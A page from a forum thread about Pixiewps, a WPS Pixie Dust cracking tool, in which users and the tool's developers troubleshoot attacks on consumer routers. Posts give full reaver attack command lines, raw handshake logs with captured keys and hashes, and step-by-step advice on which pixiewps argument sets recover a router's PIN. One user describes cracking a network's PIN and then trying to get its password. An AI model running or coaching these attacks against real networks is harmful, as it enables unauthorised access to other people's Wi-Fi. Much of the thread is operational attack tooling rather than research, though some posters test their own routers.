Page 3 of 5 FirstFirst 12345 LastLast
Results 101 to 150 of 244

Thread: Pixiewps: wps pixie dust attack tool

  1. #101
    Join Date
    2015-Mar
    Posts
    127
    @mmusket33
    I like the idea of your script to automatically try different data sets. I tried it out and it didnt parse the output from reaver correctly.
    The E-Nouce, PKE were blank......... and it leaves out (-m, --r-nonce : Registrar nonce) - but all required data was in the reaver output

    usuage command line:
    reaver -i wlan2mon -b 00:00:00:00:A7:7C -m 00:00:00:00:2c:ee -vv -f -c6 -N -K1 -s y -A -t30 | tee /root/VARMAC_LOGS/TP-TP-LIN00000000
    Code:
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
    
    [+] Switching wlan2mon to channel 6
    [+] Waiting for beacon from 00:00:00:00:A7:7C
    [+] Associated with 00:00:00:00:A7:7C (ESSID: TP-TP-LIN0000000)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: ba:18:d0:c0:0a:6f:9e:9e:02:48:74:3c:c4:17:8e:1a
    [P] PKE: 8f:e6:47:0d:0c:c9:ee:9e:be:28:9b:c7:64:00:ed:b7:54:21:65:5d:c3:74:cb:9f:97:08:42:19:0e:b0:6a:da:91:41:97:1f:f0:79:1d:ae:d8:e3:9c:ac:10:cc:17:73:77:2a:d5:6b:68:d3:3c:85:9a:8d:ef:57:ce:bc:07:c2:7b:4b:24:f1:36:ea:0a:f7:50:b2:e4:24:89:38:99:df:b8:a9:5d:5b:29:b9:87:a7:59:72:3c:7a:6c:d7:da:88:b7:bb:4b:d9:97:08:b5:00:0c:c1:c3:96:8f:10:48:b8:5e:e6:e9:0e:0b:f4:2d:cf:4a:5a:bd:62:e3:27:1f:3e:13:93:ab:1a:b2:bd:bf:1f:41:d4:a5:4d:d9:a9:59:13:16:f0:d0:da:ad:a0:67:b4:34:27:f8:1a:85:4a:2e:a0:c0:b4:12:10:ba:54:d3:4f:ce:37:51:3f:72:f9:6d:99:d4:49:07:ca:13:2b:6f:41:bc:8a:c7:ac:bf:7b:14:58
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Name: TL-WR720N
    [P] WPS Model Number: 1.0
    [P] Access Point Serial Number: 1.0
    [+] Received M1 message
    [P] R-Nonce: 11:a4:d4:0f:5e:9e:dd:57:ae:12:5e:35:f2:49:43:18
    [P] PKR: 19:6c:b3:0b:98:97:39:c2:3c:a3:f9:10:02:64:d9:07:61:23:7e:f4:71:c7:8f:c1:0e:a9:2c:47:fd:25:7b:61:92:f7:90:fe:05:60:d6:ae:3c:8e:44:60:9f:1e:50:37:e3:5e:e5:e2:fc:b0:59:5f:37:a7:54:1a:33:63:92:ce:96:6b:9a:dd:2e:8b:cd:86:c7:1c:da:ef:45:04:be:c9:b2:0e:cd:14:ad:12:24:25:fb:32:b7:65:40:28:29:f8:5d:98:29:1c:26:1b:6e:10:93:5b:7b:56:1d:4d:84:c9:0d:cb:49:ae:4f:4c:0b:5b:b8:16:80:6e:13:59:fc:52:84:f8:33:3a:49:ee:91:31:8a:a2:4e:1a:01:b2:42:3d:a1:1c:4a:64:33:ae:db:11:05:3c:39:d5:45:69:b4:b5:a6:42:6b:95:2f:3f:b6:07:26:cb:5c:4f:dc:7f:fd:b8:f2:84:6c:5e:23:c6:e0:fd:2e:1d:fa:0a:1f:51:e1:fa
    [P] AuthKey: ad:4e:14:01:53:68:1f:c9:4b:bc:c7:7d:ab:96:08:2a:03:6d:dd:29:de:72:21:85:b0:08:a8:0b:bb:66:af:4b
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [P] E-Hash1: b6:9a:85:cb:6d:f9:67:b7:1f:00:9a:da:58:b7:60:ab:01:18:7e:92:5b:5a:43:64:49:6e:d9:32:46:1f:38:ff
    [P] E-Hash2: ab:75:8b:80:2e:68:3f:d7:d3:01:b5:81:dc:d6:0a:1e:d4:f0:67:d1:6d:d3:0e:be:80:9a:8f:d7:17:87:ac:2d
    [+] Running pixiewps with the information, wait ...
    [Pixie-Dust]  
    [Pixie-Dust]   Pixiewps 1.1
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    PDDSA-05.sh output:
    Code:
    E-Nonce: =
    E-BSSID: = 00:00:00:00:A7:7C
    PKE: =
    PKR: = 8e:8b:95:32:8b:63:02:72:29:fc:4a:60:6f:ba:63:42:e9:e3:f7:39:d3:86:fe:09:d7:94:22:48:5c:40:fd:17:54:f6:30:f5:ba:84:49:4e:34:fb:34:d8:44:c5:c9:ef:bf:e4:56:98:f8:0b:38:e4:00:39:b7:aa:75:6d:5a:77:fb:5a:eb:86:2c:86:f0:cd:44:fd:81:9d:b3:1f:e4:de:10:02:e2:02:40:f5:f3:72:ec:eb:b4:15:96:69:7a:54:ce:48:66:2a:5d:3b:6d:28:82:0c:f8:58:5f:71:31:79:45:72:a7:bd:15:89:46:ec:dc:c1:7f:a6:b5:aa:9a:51:8e:28:5d:4a:3e:87:27:f9:d9:e1:30:4e:44:aa:18:63:62:79:7e:a7:4f:85:9c:e7:5e:1d:ca:e5:81:e3:04:98:94:8c:3b:8c:b0:9c:4b:05:bb:99:3e:7b:86:19:f3:e6:e7:ae:64:be:d6:13:08:d0:9b:74:f4:b5:72:9b:62:8d
    AuthKey: = 44:7a:30:93:b2:57:65:37:ed:9e:68:ce:32:68:f6:3f:6f:93:7d:cd:9c:01:fa:8a:17:0f:25:be:94:9c:fb:03
    E-Hash1: = 96:0a:c7:fa:93:37:cd:7e:28:31:6f:a5:af:58:95:e7:28:ae:c4:54:75:62:de:8e:39:34:71:0a:ea:c4:91:bc
    E-Hash2: = df:67:fb:4e:b9:bb:b6:0c:82:78:80:99:7c:bb:9f:a4:b2:4f:04:fd:e0:db:dd:32:ae:5b:f1:0a:7c:35:ae:c8
      
    Pixiewps 1.1 WPS pixie dust attack tool
     Copyright (c) 2015, wiire <wi7ire@gmail.com>
    
     Usage: pixiewps <arguments>
    
     Required Arguments:
    
        -e, --pke           : Enrollee public key
        -r, --pkr           : Registrar public key
        -s, --e-hash1       : Enrollee Hash1
        -z, --e-hash2       : Enrollee Hash2
        -a, --authkey       : Authentication session key
    
     Optional Arguments:
    
        -n, --e-nonce       : Enrollee nonce (mode 2,3,4)
        -m, --r-nonce       : Registrar nonce
        -b, --e-bssid       : Enrollee BSSID
        -S, --dh-small      : Small Diffie-Hellman keys (PKr not needed)   [No]
        -f, --force         : Bruteforce the whole keyspace (mode 4)       [No]
        -v, --verbosity     : Verbosity level 1-3, 1 is quietest            [2]
    
        -h, --help          : Display this usage screen
    
     Examples:
    
     pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
     pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
     pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S
    
     [!] Bad enrollee nonce -- --e-bssid
    
    
       WPS Pin Not Found.
      Pixie Dust Sequences Exhausted - ending program.
    This was with repeated tries, in first try not posted here i used -P in reaver, in every set it left out PKE, and Enouce...no Rnouce
    I'm happy to help beta, but you should probably make your thread to troubleshoot.
    Last edited by nuroo; 2015-05-10 at 14:48.

  2. #102
    Join Date
    2013-Jul
    Posts
    818
    To Nuroo:

    First thank you very much for the heads up and the posted information.

    It looks like another version of reaver has been released that we are not aware of. Our version does not produce R:nonce.

    PDDSA-05.sh will not work with the version of reaver you have. However just as soon as we can find the new version we will add the R-nounce, correct the coding and post it. It should not take more then a day or two as the basic awk engine is in place.

    MTeams
    Last edited by mmusket33; 2015-05-11 at 12:17.

  3. #103
    Join Date
    2013-Jul
    Posts
    818
    To nuroo:

    We coded in the R:Nonce and did about an hour of testing.

    This version supports the latest modded reaver program from t6_x and datahead and soxrok2212 as of 11 May 15

    You can download PDDSA-06.sh

    http://www.datafilehost.com/d/a30c5b3d

    OR at the aircrack link in our thread above.

    Please test!

    Older versions of the modded reaver program are not supported by PDDSA-06.sh

    MTeams

  4. #104
    Join Date
    2015-Mar
    Posts
    127
    Would be cool if pixie use cuda cores for -f option
    Last edited by nuroo; 2015-05-12 at 21:28.

  5. #105
    Join Date
    2015-Mar
    Posts
    54
    I've updated pixiewps.

    Changelog:
    - Mostly fixes, there were also some leaks of memory (the cracking part was ok though, so don't worry)
    - Removed "modes" from the usage screen and from the warning ("[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.")
    - Changed verbosity from 2 to 3 by default
    - Added seconds and milliseconds time prints with milliseconds precision
    - Added compiling optimizations (-O3) which I forgot last time... whoops (the cracking speed should be 2x or 3x times faster with -f)

    So this "new version" doesn't bring anything new.

    Sorry if I miss anything, been kinda busy lately. Also, sorry if I broke again some of your scripts which use pixiewps...

  6. #106
    Join Date
    2015-Mar
    Posts
    127
    Hey wiire we all appreciate your work.

    Can you clear up a few things for me please:
    Code:
    Examples:
    
     pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
     pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
     pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S
    
     [!] Not all required arguments have been supplied!
    What other arguments are used?
    Are their any other usage examples?

    Is it necessary to try all attacks on a single data set?
    Last edited by nuroo; 2015-05-14 at 20:30.

  7. #107
    Join Date
    2015-Mar
    Posts
    54
    Quote Originally Posted by nuroo View Post
    Hey wiire we all appreciate your work.

    Can you clear up a few things for me please:
    Code:
    Examples:
    
     pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
     pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
     pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S
    
     [!] Not all required arguments have been supplied!
    What other arguments are used?
    Are their any other usage examples?

    Is it necessary to try all attacks on a single data set?
    The first example is the most general and what you would normally run.

    The second example only shows that you can avoid to specify the Pkr if you have selected small keys in Reaver.

    The last example shows that pixiewps can also compute authkey if small key option in Reaver is selected but it needs also the BSSID of the target and the Registrar nonce. It's useful if you don't have a modified version of Reaver or Bully because you can gather that data from a capture file.

    Those are the only 3 useful ways you can run pixiewps. Running the first example and adding also the Enrollee BSSID and the Registrar nonce for instance doesn't 'add anything' to the program functionality.

    Pixiewps automatically tries for all modes/brands. For Realtek though it tries to bruteforce a small window of seeds. In any case if the AP might be vulnerable to that kind of bruteforce and Pixiewps wasn't able to recover the pin it'll warn you to run it again with the --force option.

    NOTE: if you use small keys on pixiewps but not on reaver, then pixiewps won't be able to find the pin even if the router is vulnerable, no matter what.

    Also for Realtek you shouldn't use small keys.

    I saw that some guys who are posting tutorial on YouTube aren't aware of these concepts.

  8. #108
    Join Date
    2015-Mar
    Posts
    127
    Thanks for the explanations, I was unsure.

    So basically use modified reaver with example 1 and avoid small keys. -f if pixie warns?

    no need to try example 2 or 3 if 1 fails.

  9. #109
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by nuroo View Post
    Thanks for the explanations, I was unsure.

    So basically use modified reaver with example 1 and avoid small keys. -f if pixie warns?

    no need to try example 2 or 3 if 1 fails.
    yup, and option 3 if you don't have the authkey

  10. #110
    Join Date
    2015-May
    Posts
    3
    why not use untwister to bruteforce the seed and then from there find the pin for the currently unsupported routers?

  11. #111
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by dragood View Post
    why not use untwister to bruteforce the seed and then from there find the pin for the currently unsupported routers?
    The reason is because not supported routers use the /dev/urandom to generate the random numbers.

    The Untwister, only supports basic PRNG of certain libraries (Glibc's, Mersenne Twister, PHP's MT-variant, Ruby's). These are simple and easy to crack PRNG.

    But not supported routers use the /dev/urandom, which is safer and complicated to manage to find the seed.

  12. #112
    Join Date
    2015-May
    Posts
    1
    That's my first time using kali linux and this kind of tools. I have successfull retrived the PIN for a BSSID, but every time i get the PIN code for a Wifi Network, the network does not show anymore @ Wash -i interfacename. With that, i could not use reaver to retrieve the password.

    I tried it 3 times, and everytime i use pixiewps, the network disappear from Wash list.

    By the way, i have another doubt, i tried to send some packets to a AP and now it show as WPS Locked, but its staying in this stats forever. I tried to change my MAC address but didn't work. I must force it to reconnect right (and maybe the router is invulnerable for this kind of command)?

    Thank you guys.

  13. #113
    Join Date
    2015-Apr
    Posts
    12
    Some Realtek chipsets are pretty secure I guess.

    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 00:00:3c:10:00:00:53:d4:00:00:74:ed:00:00:0c:48
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Name: DG-BG4100NU
    [P] WPS Model Number: EV-2006-07-27
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: c8:4b:9c:51:3d:52:23:df:ce:8e:18:d5:4b:89:1a:b3
    [P] PKR: af:f1:92:37:1c:2a:0a:39:45:43:61:12:f5:4f:e0:17:e5 :a7:87:fd:cc:2c:e2:12:bd:ea:d3:81:f5:78:69:af:d4:6 6:92:96:1e:8a:80:1e:dc:b5:0a:78:9f:61:44:46:aa:5e: 9c:be:cd:f9:9a:52:62:c6:95:8a:e2:01:66:03:fd:9c:41 :53:b5:db:b0:09:04:01:37:6f:75:35:4b:e2:07:59:15:1 2:47:70:3b:be:5c:c4:5c:34:9a:9f:d3:cf:a6:dc:e7:fb: fa:a8:b9:7b:19:ae:6f:fd:ef:82:e1:ab:ad:00:5c:29:c7 :23:10:83:9c:cc:a5:ee:dc:ff:d1:7e:a2:21:ae:43:09:7 f:7f:13:71:52:ab:fb:f1:b7:7a:8a:8f:55:4b:d6:a9:70: de:35:d0:9a:2d:24:26:8c:08:71:a0:f4:2f:2c:96:6d:be :23:17:24:1b:fa:fd:d7:27:19:d5:37:06:c5:27:d1:70:7 d:5f:34:ea:29:c7:5e:cd:d8
    [P] AuthKey: 3f:dc:87:64:38:9d:7b:fa:61:8e:c7:66:ad:5a:da:60:59 :3e:f3:c3:0b:98:24:a0:37:e7:fa:ef:7e:bc:d5:53
    [+] Sending M2 message
    [P] E-Hash1: 25:46:44:c3:0d:4c:ad:b9:02:34:77:47:d0:93:04:aa:18 :52:7b:87:aa:cf:74:4f:32:aa:c6:60:d9:d5:4f:6d
    [P] E-Hash2: eb:64:f8:14:7c:fc:e3:ba:06:a5:e8:42:c7:36:d7:98:63 :fd:f2:f1:d6:f0:e9:8d:e9:81:2d:88:db:87:13:65
    [+] Running pixiewps with the information, wait ...
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s 660 ms
    [Pixie-Dust]
    [Pixie-Dust] [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
    [Pixie-Dust]
    [+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]

  14. #114
    Join Date
    2013-Sep
    Posts
    262
    It looks like it uses the same PKE as the suported realtek chipset :
    Code:
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
    Which chipset/model is it?

  15. #115
    Join Date
    2015-Apr
    Posts
    12
    This model is Digisol DG-BG4100NU
    The E-Nonce is always generated in that format.
    E-Nonce: 00:00:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00:xx:xx

  16. #116
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by DetmL View Post
    Some Realtek chipsets are pretty secure I guess.

    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 00:00:3c:10:00:00:53:d4:00:00:74:ed:00:00:0c:48
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Name: DG-BG4100NU
    [P] WPS Model Number: EV-2006-07-27
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: c8:4b:9c:51:3d:52:23:df:ce:8e:18:d5:4b:89:1a:b3
    [P] PKR: af:f1:92:37:1c:2a:0a:39:45:43:61:12:f5:4f:e0:17:e5 :a7:87:fd:cc:2c:e2:12:bd:ea:d3:81:f5:78:69:af:d4:6 6:92:96:1e:8a:80:1e:dc:b5:0a:78:9f:61:44:46:aa:5e: 9c:be:cd:f9:9a:52:62:c6:95:8a:e2:01:66:03:fd:9c:41 :53:b5:db:b0:09:04:01:37:6f:75:35:4b:e2:07:59:15:1 2:47:70:3b:be:5c:c4:5c:34:9a:9f:d3:cf:a6:dc:e7:fb: fa:a8:b9:7b:19:ae:6f:fd:ef:82:e1:ab:ad:00:5c:29:c7 :23:10:83:9c:cc:a5:ee:dc:ff:d1:7e:a2:21:ae:43:09:7 f:7f:13:71:52:ab:fb:f1:b7:7a:8a:8f:55:4b:d6:a9:70: de:35:d0:9a:2d:24:26:8c:08:71:a0:f4:2f:2c:96:6d:be :23:17:24:1b:fa:fd:d7:27:19:d5:37:06:c5:27:d1:70:7 d:5f:34:ea:29:c7:5e:cd:d8
    [P] AuthKey: 3f:dc:87:64:38:9d:7b:fa:61:8e:c7:66:ad:5a:da:60:59 :3e:f3:c3:0b:98:24:a0:37:e7:fa:ef:7e:bc:d5:53
    [+] Sending M2 message
    [P] E-Hash1: 25:46:44:c3:0d:4c:ad:b9:02:34:77:47:d0:93:04:aa:18 :52:7b:87:aa:cf:74:4f:32:aa:c6:60:d9:d5:4f:6d
    [P] E-Hash2: eb:64:f8:14:7c:fc:e3:ba:06:a5:e8:42:c7:36:d7:98:63 :fd:f2:f1:d6:f0:e9:8d:e9:81:2d:88:db:87:13:65
    [+] Running pixiewps with the information, wait ...
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s 660 ms
    [Pixie-Dust]
    [Pixie-Dust] [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
    [Pixie-Dust]
    [+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    What it could be is that the router's time is set ahead... aka it is in the future. I forget the wiggle room that pixiewps is programmed with, but I don't think it goes into the future. I might have an older version that counts up from January 1, 1970, but it probably got erased when I reinstalled Kali... and on 10.10.4 beta my Mac kernel panics when a VM shuts down :/

    Quote Originally Posted by DetmL View Post
    This model is Digisol DG-BG4100NU
    The E-Nonce is always generated in that format.
    E-Nonce: 00:00:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00:xx:xx
    That is actually quite strange, I've never seen that before... Its always like that? The reason I ask is because before the Realtek flaw was discovered, I noticed that the PKE was static for Realtek devices (confirmed with help from kcdtv and some other users ) which made me question Realtek's implementation. I sent some data up to Dominique and he worked his magic and got back to me right away with his findings.

    --Perhaps this could mean something else....?

    Quote Originally Posted by scout View Post
    That's my first time using kali linux and this kind of tools. I have successfull retrived the PIN for a BSSID, but every time i get the PIN code for a Wifi Network, the network does not show anymore @ Wash -i interfacename. With that, i could not use reaver to retrieve the password.

    I tried it 3 times, and everytime i use pixiewps, the network disappear from Wash list.

    By the way, i have another doubt, i tried to send some packets to a AP and now it show as WPS Locked, but its staying in this stats forever. I tried to change my MAC address but didn't work. I must force it to reconnect right (and maybe the router is invulnerable for this kind of command)?

    Thank you guys.
    Some ISPs/Manufacturers have actually taken notice of the Pixie Dust attack and they lock WPS after 1 exchange, even if it fails. I also have a network where WPS disappears at random times and I can't figure that out. It might be that the owner disabled it in the firmware and it doesn't take effect until an attack but don't quote me on that, I'm really stumped as to why I can't figure it out. I can't even get to an M2 message...
    Last edited by soxrok2212; 2015-05-28 at 23:45.

  17. #117
    Join Date
    2015-Apr
    Posts
    12
    Quote Originally Posted by soxrok2212 View Post
    That is actually quite strange, I've never seen that before... Its always like that? The reason I ask is because before the Realtek flaw was discovered, I noticed that the PKE was static for Realtek devices (confirmed with help from kcdtv and some other users ) which made me question Realtek's implementation. I sent some data up to Dominique and he worked his magic and got back to me right away with his findings.

    --Perhaps this could mean something else....?
    Yes, always in that format. A google search on EV-2006-07-27 shows that it's a Realtek 8186 chipset. However, I'm not 100% sure that it is the correct chipset as the router is not in WikiDevi database.

  18. #118
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by DetmL View Post
    Yes, always in that format. A google search on EV-2006-07-27 shows that it's a Realtek 8186 chipset. However, I'm not 100% sure that it is the correct chipset as the router is not in WikiDevi database.
    You could try looking it up on the fcc database...?

  19. #119
    Join Date
    2013-Sep
    Posts
    262
    Code:
    EV-2006-07-27
    That's definitely a value that uses realtek for the tagged parameter "WPS version" in the PROBES.

    Code:
    The E-Nonce is always generated in that format.
    E-Nonce: 00:00:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00:xx:xx
    It looks like you used small DH key option (-S) when you ran reaver 1.5.2. Isn't it?
    For successful pixie dust attack vs supported realtek chipset you need to use "normal" DH keys and shouldn't use option -S in your reaver command line
    Could you send us the *.cap file with the legitimate PIN and some screenshoot from the web interface?
    Can you enter the web interface with credential super:super?
    Does your default PIN start with 0 ?

  20. #120
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by kcdtv View Post
    Code:
    EV-2006-07-27
    That's definitely a value that uses realtek for the tagged parameter "WPS version" in the PROBES.

    Code:
    The E-Nonce is always generated in that format.
    E-Nonce: 00:00:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00:xx:xx
    It looks like you used small DH key option (-S) when you ran reaver 1.5.2. Isn't it?
    For successful pixie dust attack vs supported realtek chipset you need to use "normal" DH keys and shouldn't use option -S in your reaver command line
    Could you send us the *.cap file with the legitimate PIN and some screenshoot from the web interface?
    Can you enter the web interface with credential super:super?
    Does your default PIN start with 0 ?
    It's not small DH keys, those are 00:00:00:00:00....00:00:00:00:02. If I can find the time I'll take a look at it but a cap with the WPS exch age would be helpful.

  21. #121
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by DetmL View Post
    Yes, always in that format. A google search on EV-2006-07-27 shows that it's a Realtek 8186 chipset. However, I'm not 100% sure that it is the correct chipset as the router is not in WikiDevi database.
    I just looked up the RTL8671, it is a CPU chip and not a NIC. Do you know the exact mode number of the AP and can you provide a firmware/open source code for it? Thanks.

  22. #122
    Join Date
    2015-Apr
    Posts
    12
    There is no FCC ID printed on the router. The PIN is also not printed on the router. The exact model of the AP is DIGISOL DG-BG4100NU which uses RTL8186 and not the newer RTL8671. Firmware of the router can be downloaded here https://dl.dropboxusercontent.com/u/..._11OCT2014.zip Firmware of the chipset http://sourceforge.net/projects/rtl8186/

  23. #123
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by DetmL View Post
    There is no FCC ID printed on the router. The PIN is also not printed on the router. The exact model of the AP is DIGISOL DG-BG4100NU which uses RTL8186 and not the newer RTL8671. Firmware of the router can be downloaded here https://dl.dropboxusercontent.com/u/..._11OCT2014.zip Firmware of the chipset http://sourceforge.net/projects/rtl8186/
    Thanks, we'll look into it!

  24. #124
    Join Date
    2015-Jun
    Posts
    6

    WPS Model Number: EV-2006-07-27 is RTL8671 chipset , too

    Quote Originally Posted by DetmL View Post
    Yes, always in that format. A google search on EV-2006-07-27 shows that it's a Realtek 8186 chipset. However, I'm not 100% sure that it is the correct chipset as the router is not in WikiDevi database.
    Hi, @DetmL, @soxrok2212,
    I ,recently came to know about the vulnerabilities of Realtek and other chipsets and thought to check if my router was vulnerable and ran reaver with pixie dust mode -K 1
    where I got to know that the model number EV-2006-07-27 belongs to RTL8671 chipset(D-link router).

    However I'm getting that

    "WPS pin not found"

    The output is given below:

    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 7b:37:51:7f:6c:c7:a8:0b:27:e9:a1:f8:5b:88:b5:40
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Name: RTL8671
    [P] WPS Model Number: EV-2006-07-27
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: c2:ed:e2:d6:80:81:48:fd:7e:13:7b:d2:3e:6c:a0:98
